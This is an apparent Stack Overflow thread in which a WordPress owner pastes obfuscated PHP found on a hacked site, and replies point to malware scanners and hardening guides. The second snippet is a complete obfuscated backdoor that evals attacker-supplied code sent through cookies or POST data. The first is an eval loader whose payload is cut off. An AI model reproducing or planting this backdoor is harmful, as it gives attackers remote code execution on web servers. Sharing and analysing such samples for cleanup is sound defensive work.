# I have found strange lines in my website's source files

Tags: wordpress, virus

I am using wordpress for quite a few years now but I have never seen anything like this before.

```
<?php
function oepdbzyc( $nshnmh, $af){$fnltbyd = ''; for($i=0; $i < strlen($nshnmh); $i++){$fnltbyd .= isset($af[$nshnmh[$i]]) ? $af[$nshnmh[$i]] : $nshnmh[$i];}
$imtrpsh="base64_decode";return $imtrpsh($fnltbyd);}
$zfilos = '0kXe3tsWB50fvJtQzwsQ5JFaBQz6YN8tUNpl4pld3E8l5TOXnRqGhksG5JtQzwsQzQz'.

'9=';
$loeupumf = Array('1'=>'4', '0'=>'Q', '3'=>'a', '2'=>'8', '5'=>'X', '4'=>'O', '7'=>'f', '6'=>'s', '9'=>'0', '8'=>'5', 'A'=>'k', 'C'=>'H', 'B'=>'Z', 'E'=>'W', 'D'=>'B', 'G'=>'n', 'F'=>'x', 'I'=>'j', 'H'=>'L', 'K'=>'r', 'J'=>'2', 'M'=>'1', 'L'=>'M', 'O'=>'N', 'N'=>'E', 'Q'=>'y', 'P'=>'h', 'S'=>'R', 'R'=>'C', 'U'=>'T', 'T'=>'3', 'W'=>'z', 'V'=>'F', 'Y'=>'I', 'X'=>'l', 'Z'=>'U', 'a'=>'v', 'c'=>'Y', 'b'=>'e', 'e'=>'u', 'd'=>'A', 'g'=>'6', 'f'=>'o', 'i'=>'q', 'h'=>'b', 'k'=>'G', 'j'=>'7', 'm'=>'K', 'l'=>'p', 'o'=>'i', 'n'=>'d', 'q'=>'g', 'p'=>'w', 's'=>'9', 'r'=>'P', 'u'=>'D', 't'=>'V', 'w'=>'m', 'v'=>'J', 'y'=>'t', 'x'=>'S', 'z'=>'c');
eval(oepdbzyc($zfilos, $loeupumf));?>
```

The $zfilos is more than 1900 lines long so I can't post it here. There are other bits of strange lines in random files like this one:

```
<?php $GLOBALS['i82b56'] = "\x56\x61\x66\x59\x42\x5c\x75\x72\x46\x33\x57\x24\x31\x51\x47\x70\x69\x23\x3e\x5a\x4d\x34\x5f\x55\x37\x28\x60\x54\x50\x45\x40\x4b\x25\x26\x65\x2b\x5b\x4f\x3d\x4c\x4a\xa\x64\x53\x3f\x3c\x3a\x73\x27\x9\x76\x5e\x36\x74\x21\x52\x2a\x38\x77\x41\x43\x6e\x2d\x29\x7a\x71\x62\x7c\x6f\x39\x79\x30\x6b\x35\x22\x48\x6a\x78\x49\x20\x68\x6c\x67\x58\x4e\x2e\x3b\x44\x6d\xd\x2f\x2c\x5d\x7e\x7b\x63\x32\x7d";
$GLOBALS[$GLOBALS['i82b56'][72].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][21]] = $GLOBALS['i82b56'][95].$GLOBALS['i82b56'][80].$GLOBALS['i82b56'][7];
$GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73]] = $GLOBALS['i82b56'][68].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][42];
$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]] = $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][61];
$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]] = $GLOBALS['i82b56'][16].$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][53];
$GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][9]] = $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][34];
$GLOBALS[$GLOBALS['i82b56'][70].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][2]] = $GLOBALS['i82b56'][15].$GLOBALS['i82b56'][80].$GLOBALS['i82b56'][15].$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][61];
$GLOBALS[$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][73]] = $GLOBALS['i82b56'][6].$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][34];
$GLOBALS[$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][42]] = $GLOBALS['i82b56'][66].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][34];
$GLOBALS[$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][69]] = $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][53];
$GLOBALS[$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][69]] = $GLOBALS['i82b56'][76].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][73];
$GLOBALS[$GLOBALS['i82b56'][58].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][9]] = $GLOBALS['i82b56'][50].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][96];
$GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12]] = $_POST;
$GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][9]] = $_COOKIE;
@$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]]($GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][82], NULL);
@$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]]($GLOBALS['i82b56'][81].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][82].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][47], 0);
@$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]]($GLOBALS['i82b56'][88].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][34], 0);
@$GLOBALS[$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][69]](0);

$w21270 = NULL;
$a3259b2 = NULL;

$GLOBALS[$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][52]] = $GLOBALS['i82b56'][69].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][9];
global $n669656;

function v89b2($w21270, $h174c8f)
{
    $zbf0 = "";

    for ($p0dfb=0; $p0dfb<$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]]($w21270);)
    {
        for ($p5a3154=0; $p5a3154<$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]]($h174c8f) && $p0dfb<$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]]($w21270); $p5a3154++, $p0dfb++)
        {
            $zbf0 .= $GLOBALS[$GLOBALS['i82b56'][72].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][21]]($GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73]]($w21270[$p0dfb]) ^ $GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73]]($h174c8f[$p5a3154]));
        }
    }

    return $zbf0;
}

function j7c09b5($w21270, $h174c8f)
{
    global $n669656;

    return $GLOBALS[$GLOBALS['i82b56'][58].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][9]]($GLOBALS[$GLOBALS['i82b56'][58].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][9]]($w21270, $n669656), $h174c8f);
}

foreach ($GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][9]] as $h174c8f=>$t690f0)
{
    $w21270 = $t690f0;
    $a3259b2 = $h174c8f;
}

if (!$w21270)
{
    foreach ($GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12]] as $h174c8f=>$t690f0)
    {
        $w21270 = $t690f0;
        $a3259b2 = $h174c8f;
    }
}

$w21270 = @$GLOBALS[$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][73]]($GLOBALS[$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][69]]($GLOBALS[$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][42]]($w21270), $a3259b2));
if (isset($w21270[$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][72]]) && $n669656==$w21270[$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][72]])
{
    if ($w21270[$GLOBALS['i82b56'][1]] == $GLOBALS['i82b56'][16])
    {
        $p0dfb = Array(
            $GLOBALS['i82b56'][15].$GLOBALS['i82b56'][50] => @$GLOBALS[$GLOBALS['i82b56'][70].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][2]](),
            $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][50] => $GLOBALS['i82b56'][12].$GLOBALS['i82b56'][85].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][12],
        );
        echo @$GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][9]]($p0dfb);
    }
    elseif ($w21270[$GLOBALS['i82b56'][1]] == $GLOBALS['i82b56'][34])
    {
        eval($w21270[$GLOBALS['i82b56'][42]]);
    }
    exit();
}
```

Not to mention I am fighting with the setTimeout injection as well. My hosting (which I use for like 5-6 years now) told me to change passwords, I have ended up deleting all the FTP accounts, so noone can access it, and it still appeares from time to time. I guess it's just coming from their end.

Any clues what's this and how to stop it? Oh and I am using the stock theme, no fancy plugins, nothing.

Comment: Does your host provide ssh access? If not then there's no way to get this _'from their end'_. The malware script is most likely sitting in your WordPress installation. Look for unusual titles. Furthermore, it probably could be even inside one of the engine files.

Comment: You should try one of [malware scanner plugins](https://wordpress.org/plugins/search.php?q=malware+scanner) if you haven't. If it not helps, checkout the [FAQ](http://codex.wordpress.org/FAQ_My_site_was_hacked) and [this](https://wordpress.org/support/topic/i-am-getting-hacked-evry-two-weeks-help-please) thread. And please use [wordpress.stackexchange.com](http://wordpress.stackexchange.com) for WordPress-related matters in the future.

Comment: @jibiel So you suggest I should download the images, wipe everything except the DB, start with a fresh install and reupload my uploads dir?

Comment: Nope, this is not a solution at all. See my second comment. Although, it could be quicker if you don't have any engine/theme/plugin modifications.

Comment: I have got Wordfence installed it has found a couple files, but after a manual search I found more... I am trying to see if any of these plugins help, if not I will start with a fresh install as I have not modified any of the files.

Answer (score 0):

You got hacked. But hacked site questions are off-topic on SO, due to their individualized nature being difficult to replicate and address.

That said, carefully follow https://codex.wordpress.org/FAQ_My_site_was_hacked

Then take a look at the recommended security measures in [Hardening WordPress - WordPress Codex](https://codex.wordpress.org/Hardening_WordPress) and [Brute Force Attacks - WordPress Codex](http://codex.wordpress.org/Brute_Force_Attacks)